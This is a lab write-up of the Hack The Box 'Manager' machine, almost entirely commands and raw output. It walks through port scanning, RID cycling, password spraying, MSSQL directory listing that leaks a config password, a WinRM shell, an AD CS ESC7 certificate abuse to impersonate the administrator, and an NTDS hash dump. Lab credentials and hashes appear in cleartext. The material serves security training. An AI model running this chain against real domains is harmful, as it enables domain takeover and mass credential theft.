Manager
1. User
1.1. Recon
1.1.1. PortScan
Starting Nmap 7.95 ( https://nmap.org ) at 2025-10-27 08:45 EDT
Nmap scan report for DC01.manager.htb (10.129.33.188)
Host is up (0.083s latency).
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
|_http-title: Manager
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-10-27 19:45:19Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc01.manager.htb
| Not valid before: 2024-08-30T17:08:51
|_Not valid after: 2122-07-27T10:31:04
|_ssl-date: 2025-10-27T19:46:50+00:00; +7h00m00s from scanner time.
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-10-27T19:46:50+00:00; +7h00m00s from scanner time.
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc01.manager.htb
| Not valid before: 2024-08-30T17:08:51
|_Not valid after: 2122-07-27T10:31:04
1433/tcp open ms-sql-s Microsoft SQL Server 2019 15.00.2000.00; RTM
| ms-sql-info:
| 10.129.33.188:1433:
| Version:
| name: Microsoft SQL Server 2019 RTM
| number: 15.00.2000.00
| Product: Microsoft SQL Server 2019
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 1433
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2025-10-27T19:37:41
|_Not valid after: 2055-10-27T19:37:41
|_ssl-date: 2025-10-27T19:46:50+00:00; +7h00m00s from scanner time.
| ms-sql-ntlm-info:
| 10.129.33.188:1433:
| Target_Name: MANAGER
| NetBIOS_Domain_Name: MANAGER
| NetBIOS_Computer_Name: DC01
| DNS_Domain_Name: manager.htb
| DNS_Computer_Name: dc01.manager.htb
| DNS_Tree_Name: manager.htb
|_ Product_Version: 10.0.17763
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-10-27T19:46:50+00:00; +7h00m00s from scanner time.
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc01.manager.htb
| Not valid before: 2024-08-30T17:08:51
|_Not valid after: 2122-07-27T10:31:04
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc01.manager.htb
| Not valid before: 2024-08-30T17:08:51
|_Not valid after: 2122-07-27T10:31:04
|_ssl-date: 2025-10-27T19:46:50+00:00; +7h00m00s from scanner time.
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
49667/tcp open msrpc Microsoft Windows RPC
49687/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49688/tcp open msrpc Microsoft Windows RPC
49691/tcp open msrpc Microsoft Windows RPC
49721/tcp open msrpc Microsoft Windows RPC
49789/tcp open msrpc Microsoft Windows RPC
63195/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
|_clock-skew: mean: 6h59m59s, deviation: 0s, median: 6h59m59s
| smb2-time:
| date: 2025-10-27T19:46:10
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 98.25 seconds
1.2. RID Cycling
┌──(root㉿kali)-[~/Desktop/htb/manager]
└─# nxc smb 10.129.33.188 -u guest -p '' --rid-brute
SMB 10.129.33.188 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:manager.htb) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.129.33.188 445 DC01 [+] manager.htb\guest:
SMB 10.129.33.188 445 DC01 498: MANAGER\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB 10.129.33.188 445 DC01 500: MANAGER\Administrator (SidTypeUser)
SMB 10.129.33.188 445 DC01 501: MANAGER\Guest (SidTypeUser)
SMB 10.129.33.188 445 DC01 502: MANAGER\krbtgt (SidTypeUser)
SMB 10.129.33.188 445 DC01 512: MANAGER\Domain Admins (SidTypeGroup)
SMB 10.129.33.188 445 DC01 513: MANAGER\Domain Users (SidTypeGroup)
SMB 10.129.33.188 445 DC01 514: MANAGER\Domain Guests (SidTypeGroup)
SMB 10.129.33.188 445 DC01 515: MANAGER\Domain Computers (SidTypeGroup)
SMB 10.129.33.188 445 DC01 516: MANAGER\Domain Controllers (SidTypeGroup)
SMB 10.129.33.188 445 DC01 517: MANAGER\Cert Publishers (SidTypeAlias)
SMB 10.129.33.188 445 DC01 518: MANAGER\Schema Admins (SidTypeGroup)
SMB 10.129.33.188 445 DC01 519: MANAGER\Enterprise Admins (SidTypeGroup)
SMB 10.129.33.188 445 DC01 520: MANAGER\Group Policy Creator Owners (SidTypeGroup)
SMB 10.129.33.188 445 DC01 521: MANAGER\Read-only Domain Controllers (SidTypeGroup)
SMB 10.129.33.188 445 DC01 522: MANAGER\Cloneable Domain Controllers (SidTypeGroup)
SMB 10.129.33.188 445 DC01 525: MANAGER\Protected Users (SidTypeGroup)
SMB 10.129.33.188 445 DC01 526: MANAGER\Key Admins (SidTypeGroup)
SMB 10.129.33.188 445 DC01 527: MANAGER\Enterprise Key Admins (SidTypeGroup)
SMB 10.129.33.188 445 DC01 553: MANAGER\RAS and IAS Servers (SidTypeAlias)
SMB 10.129.33.188 445 DC01 571: MANAGER\Allowed RODC Password Replication Group (SidTypeAlias)
SMB 10.129.33.188 445 DC01 572: MANAGER\Denied RODC Password Replication Group (SidTypeAlias)
SMB 10.129.33.188 445 DC01 1000: MANAGER\DC01$ (SidTypeUser)
SMB 10.129.33.188 445 DC01 1101: MANAGER\DnsAdmins (SidTypeAlias)
SMB 10.129.33.188 445 DC01 1102: MANAGER\DnsUpdateProxy (SidTypeGroup)
SMB 10.129.33.188 445 DC01 1103: MANAGER\SQLServer2005SQLBrowserUser$DC01 (SidTypeAlias)
SMB 10.129.33.188 445 DC01 1113: MANAGER\Zhong (SidTypeUser)
SMB 10.129.33.188 445 DC01 1114: MANAGER\Cheng (SidTypeUser)
SMB 10.129.33.188 445 DC01 1115: MANAGER\Ryan (SidTypeUser)
SMB 10.129.33.188 445 DC01 1116: MANAGER\Raven (SidTypeUser)
SMB 10.129.33.188 445 DC01 1117: MANAGER\JinWoo (SidTypeUser)
SMB 10.129.33.188 445 DC01 1118: MANAGER\ChinHae (SidTypeUser)
SMB 10.129.33.188 445 DC01 1119: MANAGER\Operator (SidTypeUser)
密码喷洒
┌──(root㉿kali)-[~/Desktop/htb/manager]
└─# nxc smb 10.129.33.188 -u valid_users -p passwords --continue-on-success
SMB 10.129.33.188 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:manager.htb) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.129.33.188 445 DC01 [-] manager.htb\Zhong:Zhong STATUS_LOGON_FAILURE
SMB 10.129.33.188 445 DC01 [-] manager.htb\Cheng:Zhong STATUS_LOGON_FAILURE
SMB 10.129.33.188 445 DC01 [-] manager.htb\Ryan:Zhong STATUS_LOGON_FAILURE
SMB 10.129.33.188 445 DC01 [-] manager.htb\Raven:Zhong STATUS_LOGON_FAILURE
SMB 10.129.33.188 445 DC01 [-] manager.htb\JinWoo:Zhong STATUS_LOGON_FAILURE
SMB 10.129.33.188 445 DC01 [-] manager.htb\ChinHae:Zhong STATUS_LOGON_FAILURE
SMB 10.129.33.188 445 DC01 [-]
<SNIP>
SMB 10.129.33.188 445 DC01 [+] manager.htb\Operator:operator
1.3. bloodhound
没东西
┌──(root㉿kali)-[~/Desktop/htb/manager]
└─# nxc smb 10.129.33.188 -u operator -p operator --shares
SMB 10.129.33.188 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:manager.htb) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.129.33.188 445 DC01 [+] manager.htb\operator:operator
SMB 10.129.33.188 445 DC01 [*] Enumerated shares
SMB 10.129.33.188 445 DC01 Share Permissions Remark
SMB 10.129.33.188 445 DC01 ----- ----------- ------
SMB 10.129.33.188 445 DC01 ADMIN$ Remote Admin
SMB 10.129.33.188 445 DC01 C$ Default share
SMB 10.129.33.188 445 DC01 IPC$ READ Remote IPC
SMB 10.129.33.188 445 DC01 NETLOGON READ Logon server share
SMB 10.129.33.188 445 DC01 SYSVOL READ Logon server share
┌──(root㉿kali)-[~/Desktop/htb/manager]
└─# nxc mssql 10.129.33.188 -u operator -p operator
MSSQL 10.129.33.188 1433 DC01 [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:manager.htb)
MSSQL 10.129.33.188 1433 DC01 [+] manager.htb\operator:operator
1.4. mssql
┌──(root㉿kali)-[~/Desktop/htb/manager]
└─# impacket-mssqlclient 'manager.htb/operator:operator@10.129.33.188' -windows-auth
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC01\SQLEXPRESS): Line 1: Changed database context to 'master'.
[*] INFO(DC01\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208)
[!] Press help for extra shell commands
SQL (MANAGER\Operator guest@master)> enum_db
name is_trustworthy_on
------ -----------------
master 0
tempdb 0
model 0
msdb 1
SQL (MANAGER\Operator guest@msdb)> SELECT * FROM INFORMATION_SCHEMA.TABLES;
TABLE_CATALOG TABLE_SCHEMA TABLE_NAME TABLE_TYPE
------------- ------------ ------------------------------------------ ----------
msdb dbo syspolicy_policy_category_subscriptions b'VIEW'
msdb dbo syspolicy_system_health_state b'VIEW'
msdb dbo syspolicy_policy_execution_history b'VIEW'
msdb dbo syspolicy_policy_execution_history_details b'VIEW'
msdb dbo syspolicy_configuration b'VIEW'
msdb dbo syspolicy_conditions b'VIEW'
msdb dbo syspolicy_policy_categories b'VIEW'
msdb dbo sysdac_instances b'VIEW'
msdb dbo syspolicy_object_sets b'VIEW'
msdb dbo dm_hadr_automatic_seeding_history b'BASE TABLE'
msdb dbo syspolicy_policies b'VIEW'
msdb dbo backupmediaset b'BASE TABLE'
msdb dbo backupmediafamily b'BASE TABLE'
msdb dbo backupset b'BASE TABLE'
msdb dbo autoadmin_backup_configuration_summary b'VIEW'
msdb dbo backupfile b'BASE TABLE'
msdb dbo syspolicy_target_sets b'VIEW'
msdb dbo restorehistory b'BASE TABLE'
msdb dbo restorefile b'BASE TABLE'
msdb dbo syspolicy_target_set_levels b'VIEW'
msdb dbo restorefilegroup b'BASE TABLE'
msdb dbo logmarkhistory b'BASE TABLE'
msdb dbo suspect_pages b'BASE TABLE'
没东西
SQL (MANAGER\Operator guest@master)> xp_dirtree c:\inetpub\wwwroot
subdirectory depth file
------------------------------- ----- ----
about.html 1 1
contact.html 1 1
css 1 0
images 1 0
index.html 1 1
js 1 0
service.html 1 1
>>>> web.config 1 1
>>>> website-backup-27-07-23-old.zip 1 1
website/.old-conf.xml
<?xml version="1.0" encoding="UTF-8"?>
<ldap-conf xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
<server>
<host>dc01.manager.htb</host>
<open-port enabled="true">389</open-port>
<secure-port enabled="false">0</secure-port>
<search-base>dc=manager,dc=htb</search-base>
<server-type>microsoft</server-type>
<access-user>
>>>> <user>raven@manager.htb</user>
>>>> <password>R4v3nBe5tD3veloP3r!123</password>
</access-user>
<uid-attribute>cn</uid-attribute>
</server>
<search type="full">
<dir-list>
<dir>cn=Operator1,CN=users,dc=manager,dc=htb</dir>
</dir-list>
</search>
</ldap-conf>
1.5. winrm
┌──(root㉿kali)-[~/Desktop/htb/manager/website]
└─# evil-winrm -i dc01.manager.htb -r manager.htb
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Raven\Documents> whoami
manager\raven
*Evil-WinRM* PS C:\Users\Raven\Documents> dir
*Evil-WinRM* PS C:\Users\Raven\Documents> cd ../
*Evil-WinRM* PS C:\Users\Raven> dir
Directory: C:\Users\Raven
Mode LastWriteTime Length Name
---- ------------- ------ ----
d-r--- 7/27/2023 8:24 AM Desktop
d-r--- 7/27/2023 8:23 AM Documents
d-r--- 9/15/2018 12:19 AM Downloads
d-r--- 9/15/2018 12:19 AM Favorites
d-r--- 9/15/2018 12:19 AM Links
d-r--- 9/15/2018 12:19 AM Music
d-r--- 9/15/2018 12:19 AM Pictures
d----- 9/15/2018 12:19 AM Saved Games
d-r--- 9/15/2018 12:19 AM Videos
*Evil-WinRM* PS C:\Users\Raven> cd ../
*Evil-WinRM* PS C:\Users> cd desktop
Cannot find path 'C:\Users\desktop' because it does not exist.
At line:1 char:1
+ cd desktop
+ ~~~~~~~~~~
+ CategoryInfo : ObjectNotFound: (C:\Users\desktop:String) [Set-Location], ItemNotFoundException
+ FullyQualifiedErrorId : PathNotFound,Microsoft.PowerShell.Commands.SetLocationCommand
*Evil-WinRM* PS C:\Users> cd raven/desktop
*Evil-WinRM* PS C:\Users\raven\desktop> dir
Directory: C:\Users\raven\desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 10/27/2025 12:38 PM 34 user.txt
*Evil-WinRM* PS C:\Users\raven\desktop> gc user.txt
6c32cb5fa7656741ca06e628ca09fa27
2. System
2.1. ESC7
┌──(root㉿kali)-[~/Desktop/htb/manager]
└─# certipy find -k -no-pass -dc-ip 10.129.33.188 -target dc01.manager.htb -dc-host dc01.manager.htb -vulnerable -stdout
Certipy v5.0.3 - by Oliver Lyak (ly4k)
[*] Finding certificate templates
[*] Found 33 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 11 enabled certificate templates
[*] Finding issuance policies
[*] Found 13 issuance policies
[*] Found 0 OIDs linked to templates
[*] Retrieving CA configuration for 'manager-DC01-CA' via RRP
[*] Successfully retrieved CA configuration for 'manager-DC01-CA'
[*] Checking web enrollment for CA 'manager-DC01-CA' @ 'dc01.manager.htb'
[!] Error checking web enrollment: timed out
[!] Use -debug to print a stacktrace
[*] Enumeration output:
Certificate Authorities
0
CA Name : manager-DC01-CA
DNS Name : dc01.manager.htb
Certificate Subject : CN=manager-DC01-CA, DC=manager, DC=htb
Certificate Serial Number : 5150CE6EC048749448C7390A52F264BB
Certificate Validity Start : 2023-07-27 10:21:05+00:00
Certificate Validity End : 2122-07-27 10:31:04+00:00
Web Enrollment
HTTP
Enabled : False
HTTPS
Enabled : False
User Specified SAN : Disabled
Request Disposition : Issue
Enforce Encryption for Requests : Enabled
Active Policy : CertificateAuthority_MicrosoftDefault.Policy
Permissions
Owner : MANAGER.HTB\Administrators
Access Rights
Enroll : MANAGER.HTB\Operator
MANAGER.HTB\Authenticated Users
MANAGER.HTB\Raven
ManageCa : MANAGER.HTB\Administrators
MANAGER.HTB\Domain Admins
MANAGER.HTB\Enterprise Admins
MANAGER.HTB\Raven
ManageCertificates : MANAGER.HTB\Administrators
MANAGER.HTB\Domain Admins
MANAGER.HTB\Enterprise Admins
[+] User Enrollable Principals : MANAGER.HTB\Authenticated Users
MANAGER.HTB\Raven
[+] User ACL Principals : MANAGER.HTB\Raven
[!] Vulnerabilities
ESC7 : User has dangerous permissions.
Certificate Templates : [!] Could not find any certificate templates
┌──(root㉿kali)-[~/Desktop/htb/manager]
└─# certipy ca \
-u 'raven@manager.htb' \
-p 'R4v3nBe5tD3veloP3r!123' \
-dc-ip 10.129.33.188 \
-ca 'manager-DC01-CA' \
-add-officer 'raven'
Certipy v5.0.3 - by Oliver Lyak (ly4k)
[*] Successfully added officer 'Raven' on 'manager-DC01-CA'
┌──(root㉿kali)-[~/Desktop/htb/manager]
└─# certipy req \
-u 'raven@manager.htb' \
-p 'R4v3nBe5tD3veloP3r!123' \
-dc-ip 10.129.33.188 \
-ca 'manager-DC01-CA' \
-template 'SubCA' \
-upn 'administrator@manager.htb'
Certipy v5.0.3 - by Oliver Lyak (ly4k)
[*] Requesting certificate via RPC
[*] Request ID is 22
[-] Got error while requesting certificate: code: 0x80094012 - CERTSRV_E_TEMPLATE_DENIED - The permissions on the certificate template do not allow the current user to enroll for this type of certificate.
Would you like to save the private key? (y/N): y
[*] Saving private key to '22.key'
[*] Wrote private key to '22.key'
[-] Failed to request certificate
┌──(root㉿kali)-[~/Desktop/htb/manager]
└─# certipy ca \
-u 'raven@manager.htb' \
-p 'R4v3nBe5tD3veloP3r!123' \
-dc-ip 10.129.33.188 \
-ca 'manager-DC01-CA' \
-issue-request 22
Certipy v5.0.3 - by Oliver Lyak (ly4k)
[*] Successfully issued certificate request ID 22
┌──(root㉿kali)-[~/Desktop/htb/manager]
└─# certipy req \
-u 'raven@manager.htb' \
-p 'R4v3nBe5tD3veloP3r!123' \
-dc-ip 10.129.33.188 \
-ca 'manager-DC01-CA' \
-retrieve 22
Certipy v5.0.3 - by Oliver Lyak (ly4k)
[*] Retrieving certificate with ID 22
[*] Successfully retrieved certificate
[*] Got certificate with UPN 'administrator@manager.htb'
[*] Certificate has no object SID
[*] Loaded private key from '22.key'
[*] Saving certificate and private key to 'administrator.pfx'
[*] Wrote certificate and private key to 'administrator.pfx'
┌──(root㉿kali)-[~/Desktop/htb/manager]
└─# certipy auth \
-pfx administrator.pfx \
-dc-ip 10.129.33.188
Certipy v5.0.3 - by Oliver Lyak (ly4k)
[*] Certificate identities:
[*] SAN UPN: 'administrator@manager.htb'
[*] Using principal: 'administrator@manager.htb'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'administrator.ccache'
[*] Wrote credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@manager.htb': aad3b435b51404eeaad3b435b51404ee:ae5064c2f62317332c88629e025924ef
┌──(root㉿kali)-[~/Desktop/htb/manager]
└─# nxc smb 10.129.33.188 -u administrator -H ae5064c2f62317332c88629e025924ef --ntds
SMB 10.129.33.188 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:manager.htb) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.129.33.188 445 DC01 [+] manager.htb\administrator:ae5064c2f62317332c88629e025924ef (Pwn3d!)
SMB 10.129.33.188 445 DC01 [+] Dumping the NTDS, this could take a while so go grab a redbull...
SMB 10.129.33.188 445 DC01 Administrator:500:aad3b435b51404eeaad3b435b51404ee:ae5064c2f62317332c88629e025924ef:::
SMB 10.129.33.188 445 DC01 Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB 10.129.33.188 445 DC01 krbtgt:502:aad3b435b51404eeaad3b435b51404ee:b5edce70e6c1efa075f14bcf5231f79a:::
SMB 10.129.33.188 445 DC01 Zhong:1113:aad3b435b51404eeaad3b435b51404ee:7d148e27d43945dca3f9a9ae6cb93e47:::
SMB 10.129.33.188 445 DC01 Cheng:1114:aad3b435b51404eeaad3b435b51404ee:5f9fb454ca66927468e91362c391d4fb:::
SMB 10.129.33.188 445 DC01 Ryan:1115:aad3b435b51404eeaad3b435b51404ee:7f4e434796eeb1aa0c69630613dbc8a4:::
SMB 10.129.33.188 445 DC01 Raven:1116:aad3b435b51404eeaad3b435b51404ee:1635e153d4d6541a6367ec7a369d1fc7:::
SMB 10.129.33.188 445 DC01 JinWoo:1117:aad3b435b51404eeaad3b435b51404ee:43b026fc35e89627f2aed3420a1ff09b:::
SMB 10.129.33.188 445 DC01 ChinHae:1118:aad3b435b51404eeaad3b435b51404ee:bcc5893596907bc0672ee1a42f6b887b:::
SMB 10.129.33.188 445 DC01 Operator:1119:aad3b435b51404eeaad3b435b51404ee:e337e31aa4c614b2895ad684a51156df:::
SMB 10.129.33.188 445 DC01 DC01$:1000:aad3b435b51404eeaad3b435b51404ee:452a4c05d648cefa2a173dbbcd2db654:::
SMB 10.129.33.188 445 DC01 [+] Dumped 11 NTDS hashes to /root/.nxc/logs/ntds/10.129.33.188_None_2025-10-27_173645.ntds of which 10 were added to the database
SMB 10.129.33.188 445 DC01 [*] To extract only enabled accounts from the output file, run the following command:
SMB 10.129.33.188 445 DC01 [*] cat /root/.nxc/logs/ntds/10.129.33.188_None_2025-10-27_173645.ntds | grep -iv disabled | cut -d ':' -f1
SMB 10.129.33.188 445 DC01 [*] grep -iv disabled /root/.nxc/logs/ntds/10.129.33.188_None_2025-10-27_173645.ntds | cut -d ':' -f1